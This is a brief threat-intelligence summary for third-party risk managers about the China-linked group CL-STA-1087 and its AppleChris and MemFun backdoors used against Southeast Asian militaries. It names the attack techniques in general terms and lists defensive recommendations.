China‑Linked APT CL‑STA‑1087 Conducts Long‑Term Espionage Against Southeast Asian Militaries Using AppleChris and MemFun Malware
What Happened — A China‑affiliated advanced‑persistent‑threat group, tracked as CL‑STA‑1087, has been infiltrating Southeast Asian defence ministries since at least 2020. The actors deployed two custom backdoors, AppleChris and MemFun, leveraging PowerShell, WMI, DLL hijacking and in‑memory techniques to maintain persistence and exfiltrate highly sensitive C4I and organisational‑structure data.
Why It Matters for TPRM —
- Espionage campaigns often use third‑party software supply chains, exposing partner organisations to covert compromise.
- Long‑dwell attacks can persist on unmanaged endpoints, bypassing typical vendor security assessments.
- The stolen military‑capability data can be weaponised against allied suppliers and contractors, raising geopolitical risk for any firm with defence‑related contracts.
Who Is Affected — Government & defence (military ministries, C4I system providers, defence contractors).
Recommended Actions —
- Review any third‑party contracts with defence ministries or contractors in Southeast Asia for exposure to CL‑STA‑1087 tactics.
- Verify that all endpoints, especially unmanaged workstations, are covered by continuous EDR monitoring and PowerShell logging.
- Harden WMI and PowerShell execution policies; enforce strict DLL loading controls and application whitelisting.
Technical Notes — The attackers used PowerShell scripts to spawn reverse shells, propagated AppleChris via WMI/.NET commands, and employed DLL hijacking, process hollowing and reflective loading for MemFun. Both backdoors communicate with C2 servers through encrypted Paste‑bin “dead‑drop resolvers” and custom HTTP verbs, using Blowfish encryption for payload delivery. Source: SecurityAffairs